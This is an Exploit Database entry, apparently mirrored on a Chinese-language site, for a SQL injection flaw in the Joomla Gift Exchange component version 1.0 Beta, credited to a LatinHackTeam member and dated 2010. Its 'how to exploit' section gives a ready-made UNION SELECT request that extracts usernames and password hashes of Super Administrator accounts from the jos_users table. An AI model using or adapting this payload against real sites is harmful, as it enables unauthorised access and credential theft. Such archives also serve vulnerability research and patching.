Joomla! Component Gift Exchange com_giftexchange 1.0 Beta – ‘pkg’ SQL Injection

• Exploit Database
• 37 阅读

• 作者： Chip d3 bi0s
  日期： 2010-03-20
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11815/

• ---------------------------------------------------------------------------------
  joomla component Gift Exchange com_giftexchange (pkg) Remote Sql Injection
  ---------------------------------------------------------------------------------
  
  Author: Chip D3 Bi0s
  Group : LatinHackTeam
  Email & msn : chipdebios[alt+64]gmail.com
  Date: 20 March 2010
  Critical Lvl: Moderate
  Impact	: Exposure of sensitive information
  Where	: From Remote
  ---------------------------------------------------------------------------
  
  Affected software description:
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  
  Application : Gift Exchange 
  version : 1.0beta
  Developer : Socialable Studios
  Website		: http://extensions.joomla.org/extensions/communities-a-groupware/membership/11680/visit
  License : GPLtype: Commercial
  price		: $25.00 :)
  Date Added: 20 March 2010
  
  Download: http://socialables.com/index.php?option=com_virtuemart&Itemid=91&category_id=28&flypage=flypage.tpl〈=en&page=shop.product_details&product_id=79&vmcchk=1&Itemid=91
  
  ---------------------------------------------------------------------------
  
  
  how to exploit
  
  http://192.168.0.1/index.php?option=com_giftexchange&view=showcase&aj=package&pkg=-1union%20select%201,2,3,4,5,concat_ws(0x3a,username,password)chipD3Bi0s,1,1,1,1,1,1,1,1,1+from+jos_users+where+usertype=0x53757065722041646D696E6973747261746F72+and+0x41646D696E6973747261746F72--
  
  
  +++++++++++++++++++++++++++++++++++++++
  [!] Produced in South America
  +++++++++++++++++++++++++++++++++++++++